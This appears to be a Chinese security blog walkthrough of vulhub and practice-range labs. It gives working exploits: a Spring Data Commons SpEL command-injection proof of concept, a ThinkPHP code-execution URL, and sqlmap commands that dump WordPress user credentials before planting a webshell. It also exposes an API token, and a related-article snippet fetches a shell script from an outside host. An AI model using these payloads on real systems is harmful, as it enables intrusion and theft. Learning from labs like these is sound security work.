WEB应用漏洞发现

最新推荐文章于 2024-07-20 18:16:53 发布
最新推荐文章于 2024-07-20 18:16:53 发布
阅读量312 收藏 1
点赞数
分类专栏: owasp top10 漏洞 文章标签: 前端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53568983/article/details/129775660
版权

WEB应用漏洞发现

一、以知框架漏洞发现

对于以知框架,直接在网上搜索对应的POC利用即可,如下介绍PHP和JAVA的两个框架漏洞,如下两个漏洞都是在vulhub环境下使用的,vulhub搭建教程

1.1 Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

1. 环境搭建
cd vulnhub
cd spring/CVE-2018-1273
docker-compose up -d

在这里插入图片描述

2. 漏洞复现

使用如上命令后直接访问http://192.168.93.131:8080/users,其中192.168.93.131是你的虚拟机的IP地址,打开后是一个登录页面,进行注册后进行抓包。如下所示:

在这里插入图片描述

POC如下所示:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述

执行如上POC后,会在虚拟机的/tmp下创建一个susses的文件,如果创建成功,就说明POC利用成功,如下命令把运行环境销毁:

 docker-compose down -v    # 把运行环境销毁

在这里插入图片描述

1.2 ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
1. 环境搭建
cd vulnhub
cd thinkphp/2-rce
docker-compose up -d

在这里插入图片描述

出现如上所示就是搭建成功的标准

2. 漏洞复现

POC如下所示:

http://192.168.93.131:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D

在这里插入图片描述

 docker-compose down -v  # 关闭漏洞环境

二、以知CMS漏洞发现

1. WordPress插件漏洞分析溯源

WordPress靶场地址,进入靶场后如下所示:

在这里插入图片描述

1.1 wpscan进行漏洞扫描

输入wpscan --url http://124.70.71.251:45047/ --api-token cwvl2xxDKRIdjM4mtoqazFQwz2evGlJ70HJHeZ4wsgk进行漏洞扫描,其中apitoken申请:APItoken注册地址

在这里插入图片描述

1.2 WordPress插件漏洞分析溯源漏洞复现过程

漏洞接口为http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22,直接使用sqlmap进行自动化注入,如下所示:

 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" --dbs
 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" -D test --tables
 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" -D test -T wp_users --columns
 sqlmap -u "http://124.70.71.251:45047/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1%22" -D test -T wp_users -C user_login,user_pass --dump

在这里插入图片描述

用户名:admin,密码:12qwaszx,进入http://124.70.71.251:45047/wp-login.php进行登录,在登录到系统后台后,我们点击“插件”——“Comment Rating”,如下所示:

在这里插入图片描述

点击更新文件就相当于保存了,使用蚁剑进行连接http://124.70.71.251:45047/wp-admin/plugin-editor.php?file=comment-rating/comment-rating.php,密码是cmd,连接成功后,如下文件夹有flag:

在这里插入图片描述

三、未知CMS漏洞发现

未知的CMS只能够看看你不能够搞到源码,进行网站扫描,看能不能给弄到

安全天天学
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
wordpress 漏洞与提权(一)
公众号
08-27 4002
WordPress核心功能SQL注入漏洞分析 本文属于转载---╮(╯▽╰)╭  绿盟科技 威胁响应中心研究员对Wordpress核心功能SQL注入漏洞(编号为CVE-2015-5623和CVE-2015-2213)进行了详细的分析 0x00 漏洞概述 在twitter上看到Wordpress核心功能出现SQL注入漏洞,想学习下,就深入的跟了下代码,结果发现老外留了好大的一个坑。虽然确实存在注入问
web应用漏洞.docx
07-05
Web 应用漏洞知识点总结 在本文中,我们将对 Web 应用漏洞进行总结,涵盖了多种类型的漏洞,如远程代码执行、SQL 注入、跨站脚本攻击(XSS)、文件包含、命令执行、任意文件删除、权限提升等。这些漏洞来自于多种 ...
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273)
wutiangui的博客
09-10 800
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
weixin_34162695的博客
02-16 346
年后趁着需要做安全测试系统不多的这个空档,学学python到处逛逛复现复现和分析一些简单的漏洞--from Lyricbao 0x00 复现环境 phpstudy wordpress 4.4版本 Quizlord 2.0版本 貌似WordPress爆出漏洞的通常基本大多都是它的插件存在安全问题。 0x01步骤 使用phpstudy搭建环境,搭建wordpress,然后登陆进后台去下载Qu...
Spring Data Commons 远程命令执行漏洞
m0_63241485的博客
08-17 480
Spring是一个开源框架,它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。从简单性、可测试性和松耦合的角度而言,任何Java应用都可以从Spring中受益。Spring的开发初衷:1、JAVA EE开发应该更加简单。2、使用接口而不是使用类,是更好的编程习惯。Spring将使用接口的复杂度几乎降低到了零。3、为JavaBean提供了一个更好的应用配置框架。...
Spring Data Commons远程命令执行(CVE-2018-1273)
Lucky1youzi的博客
01-02 264
渗透
Web应用十大安全漏洞
weixin_52281518的博客
01-28 5047
Web应用十大安全漏洞 开放Web应用程序安全项目通过调查,列出了对Web应用的危害较大的10个安全问题,也是业界集中关注最严重的问题。主要包括:未验证参数、访问控制缺陷、账户及会话管理缺陷、跨网站脚本漏洞、缓冲区溢出、命令注入漏洞、错误处理问题、密码学使用不当、远程管理漏洞Web服务器及应用服务器配置不当. 未验证参数:Web请求返回的信息没有经过有效性验证就提交给Web应用程序使用。攻击者可以利用返回信息中的缺陷,包括URL、请求字符串、cookie头部、表单项,隐含参数传递代码攻击运行Web程...
(43.1)【web应用漏洞发现漏洞平台、开发框架、CMS漏扫工具
04-29 4580
【专题】web应用漏洞发现
预防Web应用程序的漏洞
02-03
如今的Web应用程序可能会包含危险的安全缺陷。这些应用程序的全球化部署使其很容易遭受攻击,这些攻击会发现并恶意探测各种安全漏洞Web环境中两个主要的风险在于:注入——也就是SQL注入,它会让黑客更改发往...
WEB应用漏洞及修复汇总.pdf
11-16
WEB应用漏洞及修复汇总.pdf
Web应用进行XSS漏洞测试
03-03
WEB应用进行XSS漏洞测试,不能仅仅局限于在WEB页面输入XSS攻击字段,然后提交。绕过JavaScript的检测,输入XSS脚本,通常被测试人员忽略。下图为XSS恶意输入绕过JavaScript检测的攻击路径。XSS输入通常包含...
最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法
热门推荐
网站安全专家
06-30 1万+
2018年6月29日,wordpress爆出最新漏洞,该网站漏洞通杀所有wordpress版本,包括目前的wordpress 4.8.6 以及wordpress 4.9.6版本。可以删除网站上的任意文件,影响危害严重,甚至是致命的一个漏洞,如果被攻击者利用,后果将不堪设想。截止目前该漏洞还未有被修复,如果您在使用wordpress,请尽快将wp-includes文件夹下的post.php文件改名,...
WordPress漏洞之————SQL注入漏洞与提权分析
Fly_鹏程万里
03-30 5963
威胁响应中心研究员对Wordpress核心功能SQL注入漏洞(编号为CVE-2015-5623和CVE-2015-2213)进行了详细的分析 0x00 漏洞概述 在twitter上看到Wordpress核心功能出现SQL注入漏洞,想学习下,就深入的跟了下代码,结果发现老外留了好大的一个坑。虽然确实存在注入问题,但是却没有像他blog中所说的那样可以通过订阅者这样的低权限来触发SQL注入漏洞...
前端面试题日常练-day97 【Less】
最新发布
qq_44640575的博客
07-20 340
border-radius()函数用于在Less中生成圆形边框效果。通过设置border-radius()函数,我们可以为元素的边框添加圆角效果,使边框呈现圆形的外观,从而美化页面元素的边框样式。
TinyVue v3.17.0 正式发布,推出了一款基于 Quill 2.0 的富文本编辑器,功能强大、开箱即用!
OpenTiny的博客
07-17 1138
本文由体验技术团队Kagol老师原创~我们非常高兴地宣布,2024年6月26日,TinyVue 发布了 v3.17.0 🎉。TinyVue 每次大版本发布,都会给大家带来一些实用的新特性,上一个版本我们重构了 chart-core,新增 CircleProcessChart 圆环进度图等6个新的图表组件,并增加了 Statistic 数据统计组件。表格图片超链接复制粘贴插入表情文件上传@提醒斜杆菜单v-auto-tip。
谷粒商城实战笔记-39-前端基础-Vue-指令-v-on、v-for、v-if
epitomizelu的专栏
07-20 646
v-on 是 Vue.js 中的一个指令,用于在 DOM 元素上监听用户事件,并在事件触发时执行相应的 JavaScript 函数。它提供了一种将 Vue 实例中的方法与 DOM 事件关联起来的方式,使得你可以轻松地对用户交互做出响应。v-on 指令的基本语法是在元素上添加 v-on:event-name=“method”,其中 event-name 是你要监听的 DOM 事件类型(如 click、mouseover、keydown 等),method 则是 Vue 实例中定义的方法名。
LG 选择 Flutter 来增强其智能电视操作系统 webOS
恋猫de小郭的博客
07-17 1609
总的来说,LG 是 Flutter 在 TV 领域的一次新的尝试,并且它是在脱离了 Android 平台的场景下实现的支持,虽然 webOS 并不是什么流行的系统,但是这也体现出了 Flutter 的特点:可以用较低的成本实现较好性能的跨平台。后续,在 LG 的主导下,WebOS 经过进一步修改,转变为智能电视操作系统,于是 WebOS TV 就诞生了,此后 LG 的 TV 基本路线定为 webOS ,在应用层面,WebOS TV 以基于 Web 的技术为基础。然后 LG 为什么选择 webOS?
博客前端项目学习day03——框架页
qq_53237241的博客
07-19 435
【代码】博客前端项目学习day03——框架页。
前端性能优化--懒加载
weixin_43799793的博客
07-19 151
3、同时还可结合 lazy loading 属性,利用浏览器的原生属性,进一步优化图片加载,不过其延迟加载机制完全是由浏览器自身决定的,在不同浏览器上效果不同(BTW,部分浏览器可能并不支持)。2、然后对元素进行监听,当图片进入可视区域时,提取元素的 data-src 即真实的图片地址赋值给 src 属性,就会去发送请求加载图片,实现了懒加载。设置为 1 张 1px*1px 的透明图片用作占位符,以防止出现出错图标。TinyPNG 网站: https://tinypng.com/
明鉴web应用漏洞扫描系统
06-30
明鉴web应用漏洞扫描系统是一种针对网络应用程序进行漏洞扫描和安全评估的工具。它能够帮助用户快速、准确地发现和修复可能导致安全风险的漏洞。 首先,明鉴web应用漏洞扫描系统具备全面扫描的能力。它能够对应用程序的各个组成部分进行全方位的扫描,包括前端界面、后台逻辑、数据库等。通过对应用程序进行全面的漏洞检测,可以及时发现潜在的安全漏洞。 其次,明鉴web应用漏洞扫描系统具备自动化扫描的特点。它能够自动进行漏洞扫描,减轻了用户的工作负担,并且有效提高了扫描的效率。同时,它也可以定期进行自动扫描,确保应用程序的安全性能得到持续的监测和评估。 此外,明鉴web应用漏洞扫描系统具备漏洞验证的能力。它能够对扫描结果进行深入分析和验证,确认漏洞的真实性和危害性,并提供修复建议。这为用户提供了有针对性的漏洞修复方案,帮助用户更好地保障应用程序的安全性。 最后,明鉴web应用漏洞扫描系统还支持报告生成和风险评估。它能够根据扫描结果生成详细的漏洞报告,包括漏洞的类型、等级、修复建议等信息,为用户提供全面的安全评估。用户可以根据报告中的信息,有针对性地进行漏洞修复和加固工作,提升应用程序的安全性能。 总而言之,明鉴web应用漏洞扫描系统是一款功能强大、易于使用的工具,它能够帮助用户快速、准确地发现应用程序中存在的安全漏洞,并提供可行的修复建议。使用该系统可以有效提升应用程序的安全性能,保障用户的网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全天天学

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值